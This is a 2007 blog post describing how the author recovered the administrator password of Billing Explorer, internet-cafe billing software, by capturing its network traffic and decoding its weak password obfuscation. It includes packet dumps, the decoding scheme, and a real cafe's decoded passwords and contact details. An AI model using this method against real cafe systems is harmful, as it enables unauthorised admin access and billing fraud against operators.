<body><script type="text/javascript"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener('load', function(){ object[attribute] = val; }, false); } else { window.attachEvent('onload', function(){ object[attribute] = val; }); } } </script> <div id="navbar-iframe-container"></div> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="text/javascript"> gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() { if (gapi.iframes && gapi.iframes.getContext) { gapi.iframes.getContext().openChild({ url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d10192368\x26blogName\x3dChrno\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dBLUE\x26layoutType\x3dCLASSIC\x26searchRoot\x3dhttp://mckev.blogspot.com/search\x26blogLocale\x3den_US\x26v\x3d2\x26homepageUrl\x3dhttp://mckev.blogspot.com/\x26vt\x3d7389753422818032331', where: document.getElementById("navbar-iframe-container"), id: "navbar-iframe" }); } }); </script>

Sunday, December 02, 2007

How to hack Billing Explorer 2006/2007

By: Kevin Haritmonds, Dec 2007

Last week I was curious about Billing Explorer (http://www.billingexplorer.com/). Billing Explorer is a billing software used in many game centers / internet cafes in Indonesia. This software basically protects the screen and keyboard until a guest logs in and then it will start counting the usage for later charging.

My objective is to get the administrator password for this software. There are several articles about Billing Explorer that you may find on the internet, but none of that works for version 2006 above since they introduce "encrypted data communication" *yeah right*. So I'm doing my own research. Please read below article with your own responsibility.

Here's how I hack the software:
1. Login as guest on Billing Explorer. Hey do not use your real name haha..

2. Install Ethereal (http://www.ethereal.com/). This software can capture and display all network packets to and from your PC.

3. Start capturing network packets from Ethereal.

4. Logoff from Billing Explorer (yeah you will be charged for it, but it worth it *haha*)

5. Click "Admin". The Billing Explorer will ask for administrator password. This is the password we are looking for. Enter anything. It will fail, but not for long *haha*

6. Login again on Billing Explorer.

7. Stop capture packets from Ethereal.

8. Analyze the packets generated between our PC and server, you'll find some form of communication like this:

Client --> Server port 1500:
0000 00 14 2a b2 36 be 00 d0 59 c5 03 36 08 00 45 00 ..*.6...Y..6..E.
0010 00 33 00 b0 40 00 80 06 2c 8c 0a 60 5c 65 0a 60 .3..@...,..`\e.`
0020 5c 64 04 03 05 dc 85 4f 6b ab b1 9f f8 52 50 18 \d.....Ok....RP.
0030 fc 6f 7b b0 00 00 58 4a 36 24 77 77 77 34 24 31 .o{...XJ6$www4$1
0040 24 $

Server port 1500 --> Client:
0000 00 d0 59 c5 03 36 00 14 2a b2 36 be 08 00 45 00 ..Y..6..*.6...E.
0010 00 c8 8b de 40 00 80 06 a0 c8 0a 60 5c 64 0a 60 ....@......`\d.`
0020 5c 65 05 dc 04 03 b1 9f f8 52 85 4f 6b b6 50 18 \e.......R.Ok.P.
0030 fc a2 2a 2d 00 00 59 41 36 24 77 77 77 34 24 30 ..*-..YA6$www4$0
0040 38 38 31 30 34 31 30 34 31 30 34 31 30 34 31 30 8810410410410410
0050 34 24 49 6e 74 65 72 6e 65 74 20 4d 65 64 69 74 4$Internet Medit
0060 65 72 61 6e 69 61 24 41 70 61 72 74 65 6d 65 6e erania$Apartemen
0070 20 4d 65 64 69 74 65 72 61 6e 69 61 20 4a 61 6b Mediterania Jak
0080 61 72 74 61 24 45 6d 61 69 6c 20 69 6e 66 6f 5f arta$Email info_
0090 30 30 38 40 79 61 68 6f 6f 2e 63 6f 6d 20 2d 20 008@yahoo.com -
00a0 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 6c 6c 69 http://www.billi
00b0 6e 67 65 78 70 6c 6f 72 65 72 2e 63 6f 6d 24 30 ngexplorer.com$0
00c0 38 38 31 30 34 31 30 34 31 31 32 24 50 50 50 24 88104104112$PPP$
00d0 36 32 24 34 33 33 62$433

What's this all about? Well you see this is a form of TCP/IP communications between Billing Explorer client and server. Basically they are translated like this:

- Client --> Server port 1500:
"Tell me all information you can give about myself". It is represented with a string "XJ6$www4$1$".

- Server --> Client:
"Okay, okay. Your administrator password is "088104104104104104" (this is still in encrypted form). The internet cafe name is "Internet Mediterania". The address is at "Apartemen Mediterania Jakarta". E-mail is "info_008@yahoo.com". And the exit password is "088104104112". It is represented with a string "YA6$www4$088104104104104104$Internet Mediterania$Apartemen Mediterania Jakarta$Email info_008@yahoo.com - http://www.billingexplorer.com$088104104112$PPP$62$433"

Hmm this is interesting.. So how can we decrypt these numbers to reveal the real administrator password? After doing some research, here's what I found:
- Password 008 (the default password): 090106106114
- Password 007: 090106106113
- Password 0123456: 091107108109110111112113
- Password abc123: 088153154155105106107

Find the algorithm already? Yeah, the first 3 numbers represent "seed" (they are 090, 090, 091, 088 respectively in above examples). Then each character of the password can be found by substracting the next 3 numbers with the "seed". Let's try with examples:
- 090106106114: Seed "090". Password: 1st char: 106 - 090 = 16. 2nd char: 106 - 090 = 16. 3rd char: 114 - 090 = 24.
- 091107108109110111112113: Seed "091". Password: 1st char: 107 - 091 = 16. 2nd char: 108 - 091 = 17. 3rd char: 109 - 091 = 18. 4th char: 110 - 091 = 19. 5th char: 111 - 091 = 20. 6th char: 112 - 091 = 21. 7th char: 113 - 091 = 22.
- 088153154155105106107: Seed "088". Password: 1st char: 153 - 088 = 65. 2nd char: 154 - 088 = 66. 3rd char: 155 - 088 = 67. 4th char: 105 - 088 = 17. 5th char: 106 - 088 = 18. 6th char: 107 - 088 = 19.

Next to convert from these numbers to the real password is very easy. 16 means "0", 17 means "1", 18 means "2", etc. And 65 means "a", 66 means "b", 67 means "c", etc. Pretty simple huh?! So can you decrypt "088104104104104104" now? Yes, it's 00000.

Well I suggest to the creator of Billing Explorer to think a more secure way of communicating the administrator password from server to its clients. One good method is by using private and public key (ie: RSA), or another simpler one is to send the hash (ie: MD5) not the password itself.

Cheers..